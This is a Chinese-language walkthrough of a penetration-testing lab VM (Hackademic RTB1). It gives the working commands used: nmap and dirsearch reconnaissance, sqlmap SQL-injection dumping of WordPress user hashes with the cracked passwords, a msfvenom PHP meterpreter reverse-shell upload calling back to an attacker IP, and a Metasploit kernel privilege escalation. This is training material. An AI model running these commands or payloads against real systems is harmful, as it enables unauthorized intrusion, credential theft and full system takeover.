前言
这是打靶训练第二周,视频地址,靶机地址。目标是找到root下的key.txt文件。说句废话,打靶过程中,看别人通关教程,直呼我是傻逼。
信息搜集
nmap -p- 192.168.127.130 -sV,只扫到80端口
打开看很朴素
目录也没扫到什么有价值的东西
通过源码,我发现了一个/Hackademic_RTB1/xmlrpc.php 页面,我还以为是从这个地方入手,搞了半天确实有漏洞,但不是这关的入手点。
再次使用dirsearch,扫描Hackademic_RTB1目录
得到wp-login.php,发现是wordpress后台。接下来就是要得到用户名和密码了。
发现在/Hackademic_RTB1/?cat=1'存在注入点。
上sqlmap梭哈sqlmap -u "http://192.168.127.130/Hackademic_RTB1/?cat=1" --dbs,获取如下数据库
获取wordpress数据库中的表sqlmap -u "http://192.168.127.130/Hackademic_RTB1/?cat=1" -D wordpress --tables
查看wp_users表有哪些属性sqlmap -u "http://192.168.127.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns
查看user_login,user_pass字段值sqlmap -u "http://192.168.127.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login,user_pass --dump
md5在线解密后,得到如下数据
用户名 密码
NickJames admin
MaxBucky kernel
GeorgeMiller q1w2e3
JasonKonnors maxwell
TonyBlack napoleon
JohnSmith PUPPIES getshell
回到刚刚的wordpress页面,每个用户都登录看了看,发现GeorgeMiller才是真正的管理员,然后到Options->Miscellaneous可以设置文件上传,并在Allowed file extensions添加php。
生成php马msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.127.132 lport=6789 -f raw >./phpbackdoor.php
开启msf监听handler -H 192.168.127.132 -P 6789 -p php/meterpreter/reverse_tcp
Upload处上传刚刚生成的php马
访问给出的路径地址,即可成功建立session。
提权
查看内核版本是2.6.31.5,使用search 2.6.3,查找可提权模块。
还有其他工具可以查询提权模块如,老版本的Linux_Exploit_Suggester,和新版本的linux-exploit-suggester。建议打靶的时候先使用老版本的,因为新版本的查询出来的可提权模块,实在是太多了,如果一个一个试要费大量时间。
这里使用的是exploit/linux/local/rds_priv_esc
打靶完毕,收工!